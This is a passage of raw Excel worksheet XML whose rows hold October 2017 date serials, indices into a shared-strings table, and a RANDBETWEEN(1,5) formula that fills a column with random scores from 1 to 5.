        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23719" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23719" s="1">
        <v>43010.995636574073</v>
      </c>
      <c r="C23719" t="s">
        <v>2140</v>
      </c>
      <c r="E23719" s="2" t="s">
        <v>21467</v>
      </c>
      <c r="F23719">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23720" s="1">
        <v>43010.968391203707</v>
      </c>
      <c r="C23720" t="s">
        <v>6</v>
      </c>
      <c r="D23720" t="s">
        <v>25</v>
      </c>
      <c r="E23720" t="s">
        <v>21468</v>
      </c>
      <c r="F23720">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23721" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23721" s="1">
        <v>43010.968356481484</v>
      </c>
      <c r="C23721" t="s">
        <v>6</v>
      </c>
      <c r="D23721" t="s">
        <v>25</v>
      </c>
      <c r="E23721" t="s">
        <v>21468</v>
      </c>
      <c r="F23721">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23722" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23722" s="1">
        <v>43010.889236111114</v>
      </c>
      <c r="C23722" t="s">
        <v>6</v>
      </c>
      <c r="D23722" t="s">
        <v>25</v>
      </c>
      <c r="E23722" t="s">
        <v>21469</v>
      </c>
      <c r="F23722">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23723" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23723" s="1">
        <v>43010.754907407405</v>
      </c>
      <c r="C23723" t="s">
        <v>6</v>
      </c>
      <c r="D23723" t="s">
        <v>821</v>
      </c>
      <c r="E23723" s="2" t="s">
        <v>21470</v>
      </c>
      <c r="F23723">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23724" s="1">
        <v>43010.730833333335</v>
      </c>
      <c r="C23724" t="s">
        <v>10</v>
      </c>
      <c r="D23724" t="s">
        <v>23</v>
      </c>
      <c r="E23724" t="s">
        <v>21471</v>
      </c>
      <c r="F23724">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23725" s="1">
        <v>43010.714247685188</v>
      </c>
      <c r="C23725" t="s">
        <v>10</v>
      </c>
      <c r="D23725" t="s">
        <v>20</v>
      </c>
      <c r="E23725" t="s">
        <v>21472</v>
      </c>
      <c r="F23725">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23726" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23726" s="1">
        <v>43010.712546296294</v>
      </c>
      <c r="C23726" t="s">
        <v>10</v>
      </c>
      <c r="D23726" t="s">
        <v>6</v>
      </c>
      <c r="E23726" s="2" t="s">
        <v>21473</v>
      </c>
      <c r="F23726">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23727" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23727" s="1">
        <v>43010.698055555556</v>
      </c>
      <c r="C23727" t="s">
        <v>50</v>
      </c>
      <c r="E23727" s="2" t="s">
        <v>21474</v>
      </c>
      <c r="F23727">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23728" s="1">
        <v>43010.694548611114</v>
      </c>
      <c r="C23728" t="s">
        <v>461</v>
      </c>
      <c r="E23728" t="s">
        <v>21475</v>
      </c>
      <c r="F23728">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23729" s="1">
        <v>43010.686793981484</v>
      </c>
      <c r="C23729" t="s">
        <v>73</v>
      </c>
      <c r="D23729" t="s">
        <v>7</v>
      </c>
      <c r="E23729" t="s">
        <v>21476</v>
      </c>
      <c r="F23729">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23730" s="1">
        <v>43010.681909722225</v>
      </c>
      <c r="C23730" t="s">
        <v>10</v>
      </c>
      <c r="D23730" t="s">
        <v>151</v>
      </c>
      <c r="F23730">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23731" s="1">
        <v>43010.680937500001</v>
      </c>
      <c r="C23731" t="s">
        <v>10</v>
      </c>
      <c r="D23731" t="s">
        <v>151</v>
      </c>
      <c r="E23731" t="s">
        <v>3487</v>
      </c>
      <c r="F23731">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23732" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23732" s="1">
        <v>43010.633981481478</v>
      </c>
      <c r="C23732" t="s">
        <v>16</v>
      </c>
      <c r="E23732" s="2" t="s">
        <v>21477</v>
      </c>
      <c r="F23732">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23733" s="1">
        <v>43010.6091087963</v>
      </c>
      <c r="C23733" t="s">
        <v>10</v>
      </c>
      <c r="D23733" t="s">
        <v>17</v>
      </c>
      <c r="E23733" t="s">
        <v>21478</v>
      </c>
      <c r="F23733">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23734" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23734" s="1">
        <v>43010.568807870368</v>
      </c>
      <c r="C23734" t="s">
        <v>10</v>
      </c>
      <c r="D23734" t="s">
        <v>11</v>
      </c>
      <c r="E23734" t="s">
        <v>21479</v>
      </c>
      <c r="F23734">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23735" s="1">
        <v>43010.557500000003</v>
      </c>
      <c r="C23735" t="s">
        <v>10</v>
      </c>
      <c r="D23735" t="s">
        <v>163</v>
      </c>
      <c r="E23735" t="s">
        <v>21480</v>
      </c>
      <c r="F23735">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23736" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23736" s="1">
        <v>43010.556354166663</v>
      </c>
      <c r="C23736" t="s">
        <v>731</v>
      </c>
      <c r="E23736" s="2" t="s">
        <v>21481</v>
      </c>
      <c r="F23736">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23737" s="1">
        <v>43010.555243055554</v>
      </c>
      <c r="C23737" t="s">
        <v>10</v>
      </c>
      <c r="D23737" t="s">
        <v>271</v>
      </c>
      <c r="E23737" t="s">
        <v>21482</v>
      </c>
      <c r="F23737">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23738" s="1">
        <v>43010.533078703702</v>
      </c>
      <c r="C23738" t="s">
        <v>10</v>
      </c>
      <c r="D23738" t="s">
        <v>336</v>
      </c>
      <c r="E23738" t="s">
        <v>21483</v>
      </c>
      <c r="F23738">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23739" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23739" s="1">
        <v>43010.516956018517</v>
      </c>
      <c r="C23739" t="s">
        <v>280</v>
      </c>
      <c r="E23739" s="2" t="s">
        <v>21484</v>
      </c>
      <c r="F23739">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23740" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23740" s="1">
        <v>43010.514282407406</v>
      </c>
      <c r="C23740" t="s">
        <v>197</v>
      </c>
      <c r="D23740" t="s">
        <v>7</v>
      </c>
      <c r="E23740" s="2" t="s">
        <v>21485</v>
      </c>
      <c r="F23740">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23741" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23741" s="1">
        <v>43010.507164351853</v>
      </c>
      <c r="C23741" t="s">
        <v>749</v>
      </c>
      <c r="D23741" t="s">
        <v>885</v>
      </c>
      <c r="E23741" s="2" t="s">
        <v>21486</v>
      </c>
      <c r="F23741">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23742" s="1">
        <v>43010.497488425928</v>
      </c>
      <c r="C23742" t="s">
        <v>10</v>
      </c>
      <c r="D23742" t="s">
        <v>52</v>
      </c>
      <c r="E23742" t="s">
        <v>21487</v>
      </c>
      <c r="F23742">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23743" s="1">
        <v>43010.497476851851</v>
      </c>
      <c r="C23743" t="s">
        <v>10</v>
      </c>
      <c r="D23743" t="s">
        <v>52</v>
      </c>
      <c r="E23743" t="s">
        <v>21487</v>
      </c>
      <c r="F23743">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23744" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23744" s="1">
        <v>43010.480590277781</v>
      </c>
      <c r="C23744" t="s">
        <v>10</v>
      </c>
      <c r="D23744" t="s">
        <v>107</v>
      </c>
      <c r="E23744" t="s">
        <v>21488</v>
      </c>
      <c r="F23744">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23745" s="1">
        <v>43010.476342592592</v>
      </c>
      <c r="C23745" t="s">
        <v>10</v>
      </c>
      <c r="D23745" t="s">
        <v>17</v>
      </c>
      <c r="E23745" t="s">
        <v>21489</v>
      </c>
      <c r="F23745">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23746" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23746" s="1">
        <v>43010.474791666667</v>
      </c>
      <c r="C23746" t="s">
        <v>10623</v>
      </c>
      <c r="D23746" t="s">
        <v>885</v>
      </c>
      <c r="E23746" s="2" t="s">
        <v>21490</v>
      </c>
      <c r="F23746">
        <f t="shared" ref="F23746:F23809" ca="1" si="371">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="23747" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23747" s="1">
        <v>43010.461087962962</v>
      </c>
      <c r="C23747" t="s">
        <v>65</v>
      </c>
      <c r="E23747" s="2" t="s">
        <v>21491</v>
      </c>
      <c r="F23747">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23748" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23748" s="1">
        <v>43010.442476851851</v>
      </c>
      <c r="C23748" t="s">
        <v>10</v>
      </c>
      <c r="D23748" t="s">
        <v>52</v>
      </c>
      <c r="E23748" s="2" t="s">
        <v>21492</v>
      </c>
      <c r="F23748">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23749" s="1">
        <v>43010.439837962964</v>
      </c>
      <c r="C23749" t="s">
        <v>10</v>
      </c>
      <c r="D23749" t="s">
        <v>6</v>
      </c>
      <c r="E23749" t="s">
        <v>21493</v>
      </c>
      <c r="F23749">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23750" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A23750" s="1">
        <v>43010.431111111109</v>
      </c>
      <c r="C23750" t="s">
        <v>10</v>
      </c>
      <c r="D23750" t="s">
        <v>86</v>
      </c>
      <c r="E23750" s="2" t="s">
        <v>21494</v>
      </c>
      <c r="F23750">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23751" s="1">
        <v>43010.414861111109</v>
      </c>
      <c r="C23751" t="s">
        <v>10</v>
      </c>
      <c r="D23751" t="s">
        <v>80</v>
      </c>
      <c r="E23751" t="s">
        <v>21495</v>
      </c>
      <c r="F23751">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23752" s="1">
        <v>43010.406157407408</v>
      </c>
      <c r="C23752" t="s">
        <v>10</v>
      </c>
      <c r="D23752" t="s">
        <v>71</v>
      </c>
      <c r="E23752" t="s">
        <v>21496</v>
      </c>
      <c r="F23752">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23753" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23753" s="1">
        <v>43010.392233796294</v>
      </c>
      <c r="C23753" t="s">
        <v>6</v>
      </c>
      <c r="D23753" t="s">
        <v>25</v>
      </c>
      <c r="E23753" s="2" t="s">
        <v>21497</v>
      </c>
      <c r="F23753">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23754" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23754" s="1">
        <v>43010.388657407406</v>
      </c>
      <c r="C23754" t="s">
        <v>10</v>
      </c>
      <c r="D23754" t="s">
        <v>163</v>
      </c>
      <c r="E23754" s="2" t="s">
        <v>21498</v>
      </c>
      <c r="F23754">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23755" s="1">
        <v>43010.370949074073</v>
      </c>
      <c r="C23755" t="s">
        <v>48</v>
      </c>
      <c r="E23755" t="s">
        <v>21499</v>
      </c>
      <c r="F23755">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23756" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23756" s="1">
        <v>43010.323206018518</v>
      </c>
      <c r="C23756" t="s">
        <v>318</v>
      </c>
      <c r="E23756" s="2" t="s">
        <v>21500</v>
      </c>
      <c r="F23756">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23757" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23757" s="1">
        <v>43010.290092592593</v>
      </c>
      <c r="C23757" t="s">
        <v>69</v>
      </c>
      <c r="E23757" s="2" t="s">
        <v>21501</v>
      </c>
      <c r="F23757">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23758" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23758" s="1">
        <v>43010.289756944447</v>
      </c>
      <c r="C23758" t="s">
        <v>1130</v>
      </c>
      <c r="E23758" s="2" t="s">
        <v>21502</v>
      </c>
      <c r="F23758">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23759" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23759" s="1">
        <v>43010.248553240737</v>
      </c>
      <c r="C23759" t="s">
        <v>724</v>
      </c>
      <c r="E23759" s="2" t="s">
        <v>21503</v>
      </c>
      <c r="F23759">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23760" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23760" s="1">
        <v>43010.185532407406</v>
      </c>
      <c r="C23760" t="s">
        <v>48</v>
      </c>
      <c r="E23760" t="s">
        <v>21504</v>
      </c>
      <c r="F23760">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23761" s="1">
        <v>43010.10665509259</v>
      </c>
      <c r="C23761" t="s">
        <v>73</v>
      </c>
      <c r="E23761" t="s">
        <v>21505</v>
      </c>
      <c r="F23761">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23762" s="1">
        <v>43010.08803240741</v>
      </c>
      <c r="C23762" t="s">
        <v>41</v>
      </c>
      <c r="E23762" t="s">
        <v>21506</v>
      </c>
      <c r="F23762">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23763" s="1">
        <v>43009.937256944446</v>
      </c>
      <c r="C23763" t="s">
        <v>253</v>
      </c>
      <c r="E23763" t="s">
        <v>21507</v>
      </c>
      <c r="F23763">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23764" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23764" s="1">
        <v>43009.917754629627</v>
      </c>
      <c r="C23764" t="s">
        <v>836</v>
      </c>
      <c r="D23764" t="s">
        <v>2139</v>
      </c>
      <c r="E23764" s="2" t="s">
        <v>21508</v>
      </c>
      <c r="F23764">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23765" s="1">
        <v>43009.908182870371</v>
      </c>
      <c r="C23765" t="s">
        <v>10</v>
      </c>
      <c r="D23765" t="s">
        <v>89</v>
      </c>
      <c r="E23765" t="s">
        <v>21509</v>
      </c>
      <c r="F23765">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23766" s="1">
        <v>43009.663287037038</v>
      </c>
      <c r="C23766" t="s">
        <v>10</v>
      </c>
      <c r="D23766" t="s">
        <v>17</v>
      </c>
      <c r="E23766" t="s">
        <v>21510</v>
      </c>
      <c r="F23766">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23767" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23767" s="1">
        <v>43009.630844907406</v>
      </c>
      <c r="C23767" t="s">
        <v>10</v>
      </c>
      <c r="D23767" t="s">
        <v>6</v>
      </c>
      <c r="E23767" t="s">
        <v>21511</v>
      </c>
      <c r="F23767">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23768" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23768" s="1">
        <v>43009.566481481481</v>
      </c>
      <c r="C23768" t="s">
        <v>50</v>
      </c>
      <c r="E23768" s="2" t="s">
        <v>21512</v>
      </c>
      <c r="F23768">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23769" s="1">
        <v>43009.428969907407</v>
      </c>
      <c r="C23769" t="s">
        <v>60</v>
      </c>
      <c r="E23769" t="s">
        <v>21513</v>
      </c>
      <c r="F23769">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23770" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23770" s="1">
        <v>43009.141076388885</v>
      </c>
      <c r="C23770" t="s">
        <v>3994</v>
      </c>
      <c r="D23770" t="s">
        <v>2214</v>
      </c>
      <c r="E23770" s="2" t="s">
        <v>21514</v>
      </c>
      <c r="F23770">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23771" s="1">
        <v>43009.07</v>
      </c>
      <c r="C23771" t="s">
        <v>197</v>
      </c>
      <c r="E23771" t="s">
        <v>21515</v>
      </c>
      <c r="F23771">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23772" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23772" s="1">
        <v>43008.762349537035</v>
      </c>
      <c r="C23772" t="s">
        <v>6</v>
      </c>
      <c r="D23772" t="s">
        <v>821</v>
      </c>
      <c r="E23772" s="2" t="s">
        <v>21516</v>
      </c>
      <c r="F23772">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23773" s="1">
        <v>43008.243379629632</v>
      </c>
      <c r="C23773" t="s">
        <v>410</v>
      </c>
      <c r="E23773" t="s">
        <v>21517</v>
      </c>
      <c r="F23773">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23774" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23774" s="1">
        <v>43008.192164351851</v>
      </c>
      <c r="C23774" t="s">
        <v>10</v>
      </c>
      <c r="D23774" t="s">
        <v>89</v>
      </c>
      <c r="E23774" t="s">
        <v>21518</v>
      </c>
      <c r="F23774">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23775" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23775" s="1">
        <v>43008.157233796293</v>
      </c>
      <c r="C23775" t="s">
        <v>776</v>
      </c>
      <c r="E23775" s="2" t="s">
        <v>21519</v>
      </c>
      <c r="F23775">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23776" s="1">
        <v>43008.097210648149</v>
      </c>
      <c r="C23776" t="s">
        <v>97</v>
      </c>
      <c r="E23776" t="s">
        <v>21520</v>
      </c>
      <c r="F23776">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23777" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A23777" s="1">
        <v>43008.067511574074</v>
      </c>
      <c r="C23777" t="s">
        <v>318</v>
      </c>
      <c r="E23777" s="2" t="s">
        <v>21521</v>
      </c>
      <c r="F23777">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23778" s="1">
        <v>43007.890069444446</v>
      </c>
      <c r="C23778" t="s">
        <v>10</v>
      </c>
      <c r="D23778" t="s">
        <v>6</v>
      </c>
      <c r="E23778" t="s">
        <v>21522</v>
      </c>
      <c r="F23778">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23779" s="1">
        <v>43007.686493055553</v>
      </c>
      <c r="C23779" t="s">
        <v>6</v>
      </c>
      <c r="D23779" t="s">
        <v>25</v>
      </c>
      <c r="E23779" t="s">
        <v>21523</v>
      </c>
      <c r="F23779">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23780" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23780" s="1">
        <v>43007.683738425927</v>
      </c>
      <c r="C23780" t="s">
        <v>4800</v>
      </c>
      <c r="D23780" t="s">
        <v>33</v>
      </c>
      <c r="E23780" s="2" t="s">
        <v>21524</v>
      </c>
      <c r="F23780">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23781" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23781" s="1">
        <v>43007.658125000002</v>
      </c>
      <c r="C23781" t="s">
        <v>10</v>
      </c>
      <c r="D23781" t="s">
        <v>36</v>
      </c>
      <c r="E23781" t="s">
        <v>21525</v>
      </c>
      <c r="F23781">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23782" s="1">
        <v>43007.643252314818</v>
      </c>
      <c r="C23782" t="s">
        <v>189</v>
      </c>
      <c r="E23782" t="s">
        <v>21526</v>
      </c>
      <c r="F23782">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23783" s="1">
        <v>43007.617812500001</v>
      </c>
      <c r="C23783" t="s">
        <v>10</v>
      </c>
      <c r="D23783" t="s">
        <v>89</v>
      </c>
      <c r="E23783" t="s">
        <v>21527</v>
      </c>
      <c r="F23783">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23784" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23784" s="1">
        <v>43007.60765046296</v>
      </c>
      <c r="C23784" t="s">
        <v>6</v>
      </c>
      <c r="D23784" t="s">
        <v>194</v>
      </c>
      <c r="E23784" s="2" t="s">
        <v>21528</v>
      </c>
      <c r="F23784">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23785" s="1">
        <v>43007.595960648148</v>
      </c>
      <c r="C23785" t="s">
        <v>10</v>
      </c>
      <c r="D23785" t="s">
        <v>39</v>
      </c>
      <c r="E23785" t="s">
        <v>21529</v>
      </c>
      <c r="F23785">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23786" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23786" s="1">
        <v>43007.566203703704</v>
      </c>
      <c r="C23786" t="s">
        <v>10</v>
      </c>
      <c r="D23786" t="s">
        <v>6</v>
      </c>
      <c r="E23786" s="2" t="s">
        <v>21530</v>
      </c>
      <c r="F23786">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23787" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23787" s="1">
        <v>43007.473298611112</v>
      </c>
      <c r="C23787" t="s">
        <v>189</v>
      </c>
      <c r="E23787" s="2" t="s">
        <v>21531</v>
      </c>
      <c r="F23787">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23788" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23788" s="1">
        <v>43007.463958333334</v>
      </c>
      <c r="C23788" t="s">
        <v>173</v>
      </c>
      <c r="E23788" s="2" t="s">
        <v>21532</v>
      </c>
      <c r="F23788">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23789" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23789" s="1">
        <v>43007.437615740739</v>
      </c>
      <c r="C23789" t="s">
        <v>10</v>
      </c>
      <c r="D23789" t="s">
        <v>374</v>
      </c>
      <c r="E23789" s="2" t="s">
        <v>21533</v>
      </c>
      <c r="F23789">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23790" s="1">
        <v>43007.429074074076</v>
      </c>
      <c r="C23790" t="s">
        <v>623</v>
      </c>
      <c r="F23790">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23791" s="1">
        <v>43007.416678240741</v>
      </c>
      <c r="C23791" t="s">
        <v>6</v>
      </c>
      <c r="D23791" t="s">
        <v>25</v>
      </c>
      <c r="E23791" t="s">
        <v>21534</v>
      </c>
      <c r="F23791">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23792" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23792" s="1">
        <v>43007.40693287037</v>
      </c>
      <c r="C23792" t="s">
        <v>65</v>
      </c>
      <c r="E23792" s="2" t="s">
        <v>21535</v>
      </c>
      <c r="F23792">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23793" s="1">
        <v>43007.396458333336</v>
      </c>
      <c r="C23793" t="s">
        <v>6</v>
      </c>
      <c r="D23793" t="s">
        <v>25</v>
      </c>
      <c r="E23793" t="s">
        <v>21536</v>
      </c>
      <c r="F23793">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23794" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23794" s="1">
        <v>43007.367002314815</v>
      </c>
      <c r="C23794" t="s">
        <v>10</v>
      </c>
      <c r="D23794" t="s">
        <v>667</v>
      </c>
      <c r="E23794" s="2" t="s">
        <v>21537</v>
      </c>
      <c r="F23794">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23795" s="1">
        <v>43007.334178240744</v>
      </c>
      <c r="C23795" t="s">
        <v>41</v>
      </c>
      <c r="E23795" t="s">
        <v>21538</v>
      </c>
      <c r="F23795">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23796" s="1">
        <v>43007.328321759262</v>
      </c>
      <c r="C23796" t="s">
        <v>41</v>
      </c>
      <c r="E23796" t="s">
        <v>21539</v>
      </c>
      <c r="F23796">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
